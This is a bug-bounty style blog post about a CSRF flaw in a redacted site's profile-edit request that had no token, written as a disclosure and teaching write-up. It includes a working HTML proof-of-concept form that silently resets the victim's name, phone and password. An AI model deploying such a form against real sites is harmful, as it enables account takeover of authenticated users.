Story of a Basic CSRF Vulnerability
This article is about a simple CSRF vulnerability I found, I am going to discuss how I found it and share my POC. Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a CSRF vulnerability an attacker can force an authenticated victim to perform actions sensitive actions like edit account details, transfer money etc without their consent.
For the purpose of this article I am going to refer to the website I found the vulnerability on as redacted. I randomly chose to hack on redacted.com one evening. While browsing through the site and checking the requests on Burp Suite I noticed a request that didn’t have a CSRF Token like the other requests so I decided to investigate further.
As you can see in the above request there is no CSRF Token. The request can be used to edit profile details like name, email, phone number & password. I immediately created a simple POC to confirm that the request was vulnerable.
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
CSRF POC
<form method=”POST” action=”https://redacted.com/account/save">
<input value=”You have been hacked” name=”lname” type=”text”>
<input value=”You have been hacked” name=”fname” type=”text”>
<input value=”YouHaveBeenPwned” name=”password” type=”text”>
<input value=”YouHaveBeenPwned” name=”password_confirm” type=”text”>
<input value=”800000000" name=”phone” type=”number”>
<input type=”submit”>
</form>
</body>
</html>
Save the code above in a file with a extension .html, and open in a browser. In a typical attack the attacker deploys the POC above on a website and tricks the victim into opening the website. Once the website is opened by an authenticated victim the request to edit the account details is sent without their consent. With the POC above I was able to confirm that the request was vulnerable to CSRF attacks. The authentication cookies were not secure and no other means of protecting against CSRF attacks was employed in the request. You can modify the POC above as required when testing for CSRF.
I have submitted the vulnerability to the website and it has been fixed now. Looks like there are still a lot of basic bugs in the wild to find.
